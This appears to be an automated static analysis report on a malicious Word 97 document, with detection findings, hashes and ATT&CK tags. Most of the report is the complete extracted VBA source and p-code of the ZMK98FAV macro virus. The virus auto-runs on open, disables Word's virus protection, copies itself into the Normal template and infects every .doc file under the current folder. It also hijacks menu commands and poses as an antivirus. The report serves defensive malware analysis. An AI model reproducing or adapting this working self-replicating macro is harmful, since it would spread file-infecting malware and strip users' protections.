Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b137d9838bba6c9f…

MALICIOUS

Office (OLE)

49.5 KB Created: 1998-04-24 13:49:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 68bea7500c08c36762ced3f7e4e229e6 SHA-1: b253135019fe50778a79a70f1a2eb18006e6c477 SHA-256: b137d9838bba6c9f0850911161b044b87a184a9445da7482243ce234fafc6f28
248 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample exhibits characteristics of a legacy macro virus, specifically the presence of WordBasic markers and an AutoOpen macro. The VBA script attempts to copy itself to the Normal template and other documents, indicating a self-propagation mechanism. The heuristic firings and the nature of the macro strongly suggest a malicious intent to spread and potentially infect other files.

Heuristics 5

  • ClamAV: Doc.Trojan.Zmk-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Zmk-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14176 bytes
SHA-256: 14b69d56fc5c1ec0710fcbdffb61b81d02223b12a4e3ae72f39ec2c17d422f27
Detection
ClamAV: Doc.Trojan.Zmk-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ZMK98FAV"
Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorAO
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
    If WordBasic.[MacroName$](i, 0) = "ZMK98FAV" Then
        ZMK98FAVInstalled = -1
    End If
Next i
If Not ZMK98FAVInstalled Then
    MsgBox "Je suis un nouveau AntiVirus pour Word 97", vbInformation, "ZMK98FAV"
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="ZMK98FAV", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="ZMK98BM", Object:=wdOrganizerObjectProjectItems
    StatusBar = "Analyse du répertoire: " & CurDir & " pour trouver des fichier DOC..."
    For i = 1 To 500000
    Next i
    With Application.FileSearch
    If .Execute() > 0 Then
        .FileName = "*.doc"
        .LookIn = CurDir
        .SearchSubFolders = True
        For i = 1 To .FoundFiles.Count
            StatusBar = "Analyse de " & .FoundFiles(i) & " en cours..."
            Documents.Open FileName:=.FoundFiles(i)
            Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="ZMK98FAV", Object:=wdOrganizerObjectProjectItems
            Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="ZMK98BM", Object:=wdOrganizerObjectProjectItems
            ActiveDocument.Save
            StatusBar = "Analyse de " & .FoundFiles(i) & " terminé..."
        Next i
        MsgBox "Analyse du répertoire " & CurDir & " terminé!!!" & Chr$(13) & "Les " & .FoundFiles.Count & " fichiers analysés sont infectés par moi" & Chr$(13) & "HAHAHAHAHA!!!!", vbCritical, "ZMK98FAV"
        StatusBar = "[ZMK98FAV] ZeMacroKiller98 Faux AntiVirus, HAHAHAHAHA!!!!"
        Application.Run MacroName:="FichierFermerTout"
    Else
        MsgBox "Pas de fichier DOC trouvé dans " & CurDir, vbInformation, "ZMK98FAV"
        MsgBox "Mais moi, je vous ai infecté..." & Chr$(13) & "HAHAHAHAHA!!!!!", vbCritical, "ZMK98FAV"
    End If
    End With
End If
ErrorAO:
End Sub
Sub FileSaveAs()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorFSA
    Dialogs(wdDialogFileSaveAs).Show
    If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then
        ActiveDocument.SaveAs FileFormat:=wdFormatTemplate
    End If
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="ZMK98FAV", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="ZMK98BM", Object:=wdOrganizerObjectProjectItems
MsgBox "Vous feriez mieux d'acheter un VRAI ANTIVIRUS..." & Chr$(13) & "HAHAHAHAHA!!!!!", vbCritical, "ZMK98FAV"
ActiveDocument.Save
ErrorFSA:
End Sub
Sub FileTemplates()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorFT
    MsgBox "Espace Pile Insuffisant.", vbCritical, "Microsoft Word"
ErrorFT:
End Sub
Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorTM
    ZMK98BM.Show
ErrorTM:
End Sub
Sub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorVVBC
    MsgBox "Ce programme a réalisé une opération illégale et va être interrompu.", vbCritical, "Microsoft Word"
ErrorVVBC:
End Sub

Attribute VB_Name = "ZMK98BM"
Attribute VB_Base = "0{79B61193-DB8A-11D1-82B2-343705C10000}{79B61186-DB8A-11D1-82B2-343705C10000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub CommandButton1_Click()
Unload ZMK98BM
End Sub

Private Sub UserForm_Initialize()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End Sub

' Processing file: /tmp/qstore__cu9120l
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1125 bytes
' Macros/VBA/ZMK98FAV - 9664 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #2:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #5:
' 	OnError ErrorAO 
' Line #6:
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemLd CountMacros 0x0002 
' 	St iMacroCount 
' Line #7:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld iMacroCount 
' 	For 
' Line #8:
' 	Ld i 
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemLd [MacroName$] 0x0002 
' 	LitStr 0x0008 "ZMK98FAV"
' 	Eq 
' 	IfBlock 
' Line #9:
' 	LitDI2 0x0001 
' 	UMi 
' 	St ZMK98FAVInstalled 
' Line #10:
' 	EndIfBlock 
' Line #11:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #12:
' 	Ld ZMK98FAVInstalled 
' 	Not 
' 	IfBlock 
' Line #13:
' 	LitStr 0x0029 "Je suis un nouveau AntiVirus pour Word 97"
' 	Ld vbInformation 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ArgsCall MsgBox 0x0003 
' Line #14:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #15:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0007 "ZMK98BM"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #16:
' 	LitStr 0x0017 "Analyse du répertoire: "
' 	Ld CurDir 
' 	Concat 
' 	LitStr 0x0020 " pour trouver des fichier DOC..."
' 	Concat 
' 	St StatusBar 
' Line #17:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI4 0xA120 0x0007 
' 	For 
' Line #18:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #19:
' 	StartWithExpr 
' 	Ld Application 
' 	MemLd FileSearch 
' 	With 
' Line #20:
' 	ArgsMemLdWith Execute 0x0000 
' 	LitDI2 0x0000 
' 	Gt 
' 	IfBlock 
' Line #21:
' 	LitStr 0x0005 "*.doc"
' 	MemStWith FileName 
' Line #22:
' 	Ld CurDir 
' 	MemStWith LookIn 
' Line #23:
' 	LitVarSpecial (True)
' 	MemStWith SearchSubFolders 
' Line #24:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	MemLdWith FoundFiles 
' 	MemLd Count 
' 	For 
' Line #25:
' 	LitStr 0x000B "Analyse de "
' 	Ld i 
' 	ArgsMemLdWith FoundFiles 0x0001 
' 	Concat 
' 	LitStr 0x000C " en cours..."
' 	Concat 
' 	St StatusBar 
' Line #26:
' 	Ld i 
' 	ArgsMemLdWith FoundFiles 0x0001 
' 	ParamNamed FileName 
' 	Ld Documents 
' 	ArgsMemCall Option 0x0001 
' Line #27:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #28:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0007 "ZMK98BM"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #29:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #30:
' 	LitStr 0x000B "Analyse de "
' 	Ld i 
' 	ArgsMemLdWith FoundFiles 0x0001 
' 	Concat 
' 	LitStr 0x000B " terminé..."
' 	Concat 
' 	St StatusBar 
' Line #31:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #32:
' 	LitStr 0x0016 "Analyse du répertoire "
' 	Ld CurDir 
' 	Concat 
' 	LitStr 0x000B " terminé!!!"
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr$ 0x0001 
' 	Concat 
' 	LitStr 0x0004 "Les "
' 	Concat 
' 	MemLdWith FoundFiles 
' 	MemLd Count 
' 	Concat 
' 	LitStr 0x0028 " fichiers analysés sont infectés par moi"
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr$ 0x0001 
' 	Concat 
' 	LitStr 0x000E "HAHAHAHAHA!!!!"
' 	Concat 
' 	Ld vbCritical 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ArgsCall MsgBox 0x0003 
' Line #33:
' 	LitStr 0x0039 "[ZMK98FAV] ZeMacroKiller98 Faux AntiVirus, HAHAHAHAHA!!!!"
' 	St StatusBar 
' Line #34:
' 	LitStr 0x0011 "FichierFermerTout"
' 	ParamNamed MacroName 
' 	Ld Application 
' 	ArgsMemCall Run 0x0001 
' Line #35:
' 	ElseBlock 
' Line #36:
' 	LitStr 0x001F "Pas de fichier DOC trouvé dans "
' 	Ld CurDir 
' 	Concat 
' 	Ld vbInformation 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ArgsCall MsgBox 0x0003 
' Line #37:
' 	LitStr 0x001F "Mais moi, je vous ai infecté..."
' 	LitDI2 0x000D 
' 	ArgsLd Chr$ 0x0001 
' 	Concat 
' 	LitStr 0x000F "HAHAHAHAHA!!!!!"
' 	Concat 
' 	Ld vbCritical 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ArgsCall MsgBox 0x0003 
' Line #38:
' 	EndIfBlock 
' Line #39:
' 	EndWith 
' Line #40:
' 	EndIfBlock 
' Line #41:
' 	Label ErrorAO 
' Line #42:
' 	EndSub 
' Line #43:
' 	FuncDefn (Sub FileSaveAs())
' Line #44:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #45:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #46:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #47:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #48:
' 	OnError ErrorFSA 
' Line #49:
' 	Ld wdDialogFileSaveAs 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #50:
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatDocument 
' 	Eq 
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatTemplate 
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #51:
' 	Ld wdFormatTemplate 
' 	ParamNamed FileFormat 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0001 
' Line #52:
' 	EndIfBlock 
' Line #53:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #54:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0007 "ZMK98BM"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #55:
' 	LitStr 0x0030 "Vous feriez mieux d'acheter un VRAI ANTIVIRUS..."
' 	LitDI2 0x000D 
' 	ArgsLd Chr$ 0x0001 
' 	Concat 
' 	LitStr 0x000F "HAHAHAHAHA!!!!!"
' 	Concat 
' 	Ld vbCritical 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ArgsCall MsgBox 0x0003 
' Line #56:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #57:
' 	Label ErrorFSA 
' Line #58:
' 	EndSub 
' Line #59:
' 	FuncDefn (Sub FileTemplates())
' Line #60:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #61:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #62:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #63:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #64:
' 	OnError ErrorFT 
' Line #65:
' 	LitStr 0x0018 "Espace Pile Insuffisant."
' 	Ld vbCritical 
' 	LitStr 0x000E "Microsoft Word"
' 	ArgsCall MsgBox 0x0003 
' Line #66:
' 	Label ErrorFT 
' Line #67:
' 	EndSub 
' Line #68:
' 	FuncDefn (Sub ToolsMacro())
' Line #69:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #70:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #71:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #72:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #73:
' 	OnError ErrorTM 
' Line #74:
' 	Ld ZMK98BM 
' 	ArgsMemCall Show 0x0000 
' Line #75:
' 	Label ErrorTM 
' Line #76:
' 	EndSub 
' Line #77:
' 	FuncDefn (Sub ViewVBCode())
' Line #78:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #79:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #80:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #81:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #82:
' 	OnError ErrorVVBC 
' Line #83:
' 	LitStr 0x0044 "Ce programme a réalisé une opération illégale et va être interrompu."
' 	Ld vbCritical 
' 	LitStr 0x000E "Microsoft Word"
' 	ArgsCall MsgBox 0x0003 
' Line #84:
' 	Label ErrorVVBC 
' Line #85:
' 	EndSub 
' Macros/VBA/ZMK98BM - 2685 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Sub CommandButton1_Click())
' Line #2:
' 	Ld ZMK98BM 
' 	ArgsCall Unlock 0x0001 
' Line #3:
' 	EndSub 
' Line #4:
' Line #5:
' 	FuncDefn (Private Sub UserForm_Initialize())
' Line #6:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #7:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #8:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #9:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #10:
' 	EndSub